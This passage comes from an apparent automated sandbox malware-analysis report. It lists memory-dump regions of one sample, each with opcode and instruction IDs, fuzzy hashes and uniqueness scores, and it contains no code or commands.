                                                              • Opcode Fuzzy Hash: 9fdc2722124ce455d644c518d74da58405e67d257899170a4c3fa9bcbbbba9d7
                                                              • Instruction Fuzzy Hash: F9F09631C4E2C69FD72AEF7088115E93FA4EF47254F2808F6D485DB0A2D56D2506CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a95472400129c7ea2d98a020180b3b16e89c12feb1d88388ead19dbee683c3ca
                                                              • Instruction ID: ca05289c054a7e022fe32c1de8a9a9ca805aa0ce38e9c857f709994e05aba29a
                                                              • Opcode Fuzzy Hash: a95472400129c7ea2d98a020180b3b16e89c12feb1d88388ead19dbee683c3ca
                                                              • Instruction Fuzzy Hash: 9CD0C702E0C7D79FE67A3974186417C19C09F56DC0B550276D11A962D7FD4C28065E77
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d425dcf55f9389106d4d0b92061af91ca06e4ce56fa144da874ee8167ecd62d
                                                              • Instruction ID: 1ff3c54f39cd6a0eec83f1ce9460126c325f9c2e19676d8fef7ec3bdd1f57374
                                                              • Opcode Fuzzy Hash: 9d425dcf55f9389106d4d0b92061af91ca06e4ce56fa144da874ee8167ecd62d
                                                              • Instruction Fuzzy Hash: 6AD0122185F7C60FDB16BB7518150987F90AF03194B8945FFD0489B0D3E49D48598B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
                                                              • Instruction ID: 93d88ad9d18d454341b47e91e79cfc59f18f5fe90c3d5c30246520b29b034e61
                                                              • Opcode Fuzzy Hash: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
                                                              • Instruction Fuzzy Hash: 53D0CA60A0D6D38DF239BE0993202BE66A18F04780E70043EC0AF799C1ED1EB8516E12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
                                                              • Instruction ID: 0f385aa64788ea0d4050c1f60a1035c67af98a8b8e39ae57b2e6680921d57700
                                                              • Opcode Fuzzy Hash: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
                                                              • Instruction Fuzzy Hash: 94D0C920A0C6DB8DF6387E11802027A91A0DF00F80FA0403EE19F618C1ED1CB5036E07
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ._^H$._^J$._^L$._^N
                                                              • API String ID: 0-3121379274
                                                              • Opcode ID: b0613fd1345414c292bf995574b5b598baf2b22be48d6e1fea826bd9b97e1eb9
                                                              • Instruction ID: a587b38241eb674b017d9ad9fad2b2d1013a9cdaa9b1a5920aa62c704ce2d121
                                                              • Opcode Fuzzy Hash: b0613fd1345414c292bf995574b5b598baf2b22be48d6e1fea826bd9b97e1eb9
                                                              • Instruction Fuzzy Hash: 86D0C9DD8194B61ED38457B028F22FB2BC4950135CBB03A25DA66CD483D549D2C5C2E5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%